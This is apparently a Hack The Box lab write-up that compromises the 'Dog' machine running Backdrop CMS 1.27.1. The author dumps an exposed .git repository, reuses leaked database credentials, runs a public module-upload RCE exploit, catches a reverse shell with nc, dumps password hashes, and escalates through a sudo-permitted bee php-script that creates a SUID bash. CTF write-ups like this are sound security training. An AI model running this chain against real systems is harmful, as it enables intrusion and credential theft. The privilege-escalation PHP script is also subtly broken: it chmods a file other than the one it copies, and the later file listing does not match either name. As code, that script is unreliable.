Dog - HTB Machine
Dog is a Hack The Box machine released on 08 Mar 2025
Summary (How?)
Started by identifying the CMS version and other services running on the target, including Backdrop CMS 1.27.1. Through endpoint enumeration and exploration of accessible files and directories, I discovered several opened directories, among them .git which can be downloaded using git-dumper to retrieve the source code of the applicaiton
In the source code I found credentials for the database and some usernames. A lot of password reuse after I managed to access the admin panel using a combination of them. Once there, leveraged an exploit (CVE-2022-43422) to achieve remote code execution (RCE). From there, I established a web shell, which had a trick since it was getting deleted after a minute, so I modified the paylod to get a reverse shell as the www-data user.
Further enumeration revealed database information and user account hashes, which I attempted to crack but with limited success. Eventually, I used the discovered credentials to switch to the johncusack user and accessed the user flag (more password reuse).
Finally, to escalate privileges to root, I identified that the johncusack user had permissions to execute the bee command with sudo. By crafting a malicious PHP payload and executing it via bee, I was able to create a SUID binary and gain root access, ultimately retrieving the root flag.
Enumeration
We’re given the following page
CMS: Backdrop 1.27.1 (a fork from Drupal)Apache Web Server 2.4.41PHP
Kind of a token in the source code of the main page
<script>window.Backdrop = {settings: {"basePath":"\/","pathPrefix":"","drupalCompatibility":true,"ajaxPageState":{"theme":"basis","theme_token":"J0MdrAec4ZUc9cm6CKHZO_aZjKPbewDlze-iLmARzq0","css":{"core\/misc\/
theme_token":"J0MdrAec4ZUc9cm6CKHZO_aZjKPbewDlze-iLmARzq0"
Endpoints
/?q=user/login/?q=user/password/?q=about- [
/?q=posts/dog-](http://dog.htb/?q=posts/dog-obesity)xxx
Open files folders
/files
/core
robots.txt
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /core/
Disallow: /profiles/
# Files
Disallow: /README.md
Disallow: /web.config
# Paths (clean URLs)
Disallow: /admin
Disallow: /comment/reply
Disallow: /filter/tips
Disallow: /node/add
Disallow: /search
Disallow: /user/register
Disallow: /user/password
Disallow: /user/login
Disallow: /user/logout
# Paths (no clean URLs)
Disallow: /?q=admin
Disallow: /?q=comment/reply
Disallow: /?q=filter/tips
Disallow: **/?q=node/add**
Disallow: /?q=search
Disallow: /?q=user/password
Disallow: /?q=user/register
Disallow: /?q=user/login
Disallow: /?q=user/logout
CMS Version
In serveral files the version 1.27.1 is mentioned
http://dog.htb/core/profiles/testing/testing.info
http://dog.htb/core/profiles/standard/standard.info
http://dog.htb/core/modules/admin_bar/admin_bar.info
; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
Users
From posts in the page we identify
- dogBackDropSystem
Retrieving the source code
At this point I was a bit overhelmed… I had found a lot but nothing interesting to get a foothold, nor credentials, anything. As there was too much information to process, I decided to run an automated vulnerability scanner tool, based on my experience I used Nessus. The scan was a breakthru as it showed something I had missed: and opened .git repository
/.git
The next step is the tool git-dumper in order to download and reconstruct the repo.
┌──(kali㉿kali)-[~/htb-machines/dog/dog-repo]
└─$ python3 -m venv dog && source dog/bin/activate
┌──(dog)─(kali㉿kali)-[~/htb-machines/dog/dog-repo]
└─$ pip3 install git-dumper
┌──(dog)─(kali㉿kali)-[~/htb-machines/dog/dog-repo]
└─$ git-dumper http://dog.htb/.git ./dog-repo
[...]
[-] Fetching http://dog.htb/.git/objects/fb/119e5ba91dd5141e07aad5229754cd06401c99 [200]
[-] Fetching http://dog.htb/.git/objects/fb/e216729827cf70ee9a7f5230abfc1d6b1fbde6 [200]
[-] Fetching http://dog.htb/.git/objects/fb/19f504e2b822fccae54999cee48a19fc874deb [200]
[-] Fetching http://dog.htb/.git/objects/fb/cb6f3d288a7e9fa5649f5f18b36777f69e799c [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 2873 paths from the index
And finally
┌──(dog)─(kali㉿kali)-[~/htb-machines/dog/dog-repo]
└─$ ls -la
total 92
drwxrwxr-x 8 kali kali 4096 Jun 10 07:29 .
drwxrwxr-x 6 kali kali 4096 Jun 10 07:28 ..
drwxrwxr-x 9 kali kali 4096 Jun 10 07:29 core
drwxrwxr-x 7 kali kali 4096 Jun 10 07:29 files
drwxrwxr-x 7 kali kali 4096 Jun 10 07:29 .git
-rwxrwxr-x 1 kali kali 578 Jun 10 07:29 index.php
drwxrwxr-x 2 kali kali 4096 Jun 10 07:29 layouts
-rwxrwxr-x 1 kali kali 18092 Jun 10 07:29 LICENSE.txt
-rwxrwxr-x 1 kali kali 5285 Jun 10 07:29 README.md
-rwxrwxr-x 1 kali kali 1198 Jun 10 07:29 robots.txt
-rwxrwxr-x 1 kali kali 21732 Jun 10 07:29 settings.php
drwxrwxr-x 2 kali kali 4096 Jun 10 07:29 sites
drwxrwxr-x 2 kali kali 4096 Jun 10 07:29 themes
Database credentials in settings.php
$database = 'mysql://root:[email protected]/backdrop';
And there’s a user
┌──(dog)─(kali㉿kali)-[~/htb-machines/dog/dog-repo]
└─$ grep -r dog.htb
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "[email protected]"
.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
Accesing the Admin Panel
This gives us acces to the admin panel using the credentials for the database found before
Some admin users
RCE with www-data user\
Googling the CMS version we find that it is vulnerable to RCE
https://www.exploit-db.com/exploits/52021
─$ python3 exploitdb-52021.py http://dog.htb
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://dog.htb/modules/shell/shell.php
This generates a shell folder, which we have to package using tar -cvf shell.tar shell/ and then install it as a module
Finally upload and install it
Which gives us a webshell
It lasts around a minute or two and then gets deleted
Let’s try being quick with a reverse shell. Here I followed the steps as shown before, added the file rshell.php and then made a request to /shell/rshell.php. We are IN!
┌──(kali㉿kali)-[~/htb-machines/dog/rshell]
└─$ nc -lvnp 8000
listening on [any] 8000 ...
connect to [10.10.14.118] from (UNKNOWN) [10.10.11.58] 53208
Linux dog 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
18:31:34 up 5:16, 1 user, load average: 0.00, 0.15, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
johncusa pts/1 10.10.14.216 18:23 6.00s 0.08s 0.08s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Accesing the database
Once inside the machine we enumeate for other services
www-data@dog:/var/www/html$ netstat -atnlp
netstat -atnlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
Let’s connect to the database as we know root’s password from the source code.
www-data@dog:/var/www/html$ mysql -h localhost -u root -p backdrop
mysql -h localhost -u root -p backdrop
Enter password: BackDropJ2024DS2024
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1129
Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2025, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
There we have the hashes
mysql> select name,pass,mail from users;
select name,pass,mail from users;
+-------------------+---------------------------------------------------------+----------------------------+
| name | pass | mail |
+-------------------+---------------------------------------------------------+----------------------------+
| | | |
| jPAdminB | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | [email protected] |
| jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | [email protected] |
| dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | [email protected] |
| john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | [email protected] |
| morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | [email protected] |
| axel | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | [email protected] |
| rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT | [email protected] |
| tiffany | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | [email protected] |
+-------------------+---------------------------------------------------------+----------------------------+
User flag
There are two users: johncusack and jobert
The user flag is in johncusack’s home directory
ls /home
jobert johncusack
www-data@dog:/var/www/html$ ls -la /home/johncusack
ls -la /home/johncusack
total 36
drwxr-xr-x 5 johncusack johncusack 4096 Jun 10 18:30 .
drwxr-xr-x 4 root root 4096 Aug 15 2024 ..
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .bash_history -> /dev/null
[...]
-rw-r----- 1 root johncusack 33 Jun 10 13:18 user.txt
After doing a lot of useless things, like cracking the hashes extracted using hashcat
Session..........: hashcat
Status...........: Quit
Hash.Mode........: 7900 (Drupal7)
Hash.Target......: hash
Time.Started.....: Tue Jun 10 17:04:22 2025 (4 secs)
Time.Estimated...: Tue Jun 10 17:16:34 2025 (12 mins, 8 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 39377 H/s (66.50ms) @ Accel:8 Loops:512 Thr:512 Vec:1
Recovered........: 0/2 (0.00%) Digests (total), 0/2 (0.00%) Digests (new), 0/2 (0.00%) Salts
Progress.........: 0/28688768 (0.00%)
Rejected.........: 0/0 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:33280-33792
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> sackville
Hardware.Mon.#1..: Temp: 64c Fan: 66% Util:100% Core:1755MHz Mem:9751MHz Bus:8
Nothing worked, even some kernel exploits to escalate directly from www-data. Finally, I had to use tiffany’s password to log in as johncusack… I hate password reuse and even more when is not the first thing I try
www-data@dog:/$ su johncusack
su johncusack
Password: BackDropJ2024DS2024
johncusack@dog:/$ cd && cat user.txt
895745b485c4f3bd7c23c
Root flag
Enumeration inside the box
We have the following privileges as johncusack
sudo -l
[sudo] password for johncusack: BackDropJ2024DS2024
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
This is useless but interesting
Bee functionality
According to the documentation: bee is a command line utility for Backdrop CMS. It includes commands that allow developers to interact with Backdrop sites, performing actions like:
- Running cron
- Clearing caches
- Downloading and installing Backdrop
- Downloading, enabling and disabling projects
- Viewing information about a site and/or available projects
After executing it, we can see the possible use cases, and there are some interesting ones in the advanced section…
ADVANCED
db-query
dbq
Execute a query using db_query().
eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
php-script
scr
Execute an arbitrary PHP file after bootstrapping Backdrop.
sql
sqlc, sql-cli, db-cli
Open an SQL command-line interface using Backdrop's database credentials.
Let’s try by crafting a php-script that writes a SUID shell to /tmp
PHP script that writes a SUID bash shell
<?php
copy('/bin/bash', '/tmp/bash');
chmod('/tmp/suid-bash', 04755);
And then execute it using bee
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee php-script /home/johncusack/script.php
IMPORTANT: for this to work we must be placed inside /var/www/html (or the root directory of your Backdrop CMS site) because the bee command looks for the site files relative to our current working directory. If it doesn’t find them, it can’t bootstrap the CMS and gives the error:
johncusack@dog:~$ sudo /usr/local/bin/bee php-script script.php
✘ The required bootstrap level for 'php-script' is not ready.
Anything in /tmp…?
YES SIR
johncusack@dog:/var/www/html$ ls -l /tmp
total 1188
-rwsr-xr-x 1 root root 1183448 Jun 20 17:48 bas
And there we go, simply lovely with the SUID bit
johncusack@dog:/var/www/html$ /tmp/bash -p
bash-5.0# id
uid=1001(johncusack) gid=1001(johncusack) euid=0(root) groups=1001(johncusack)
bash-5.0# cat /root/root.txt
481f29e96b6fdbf464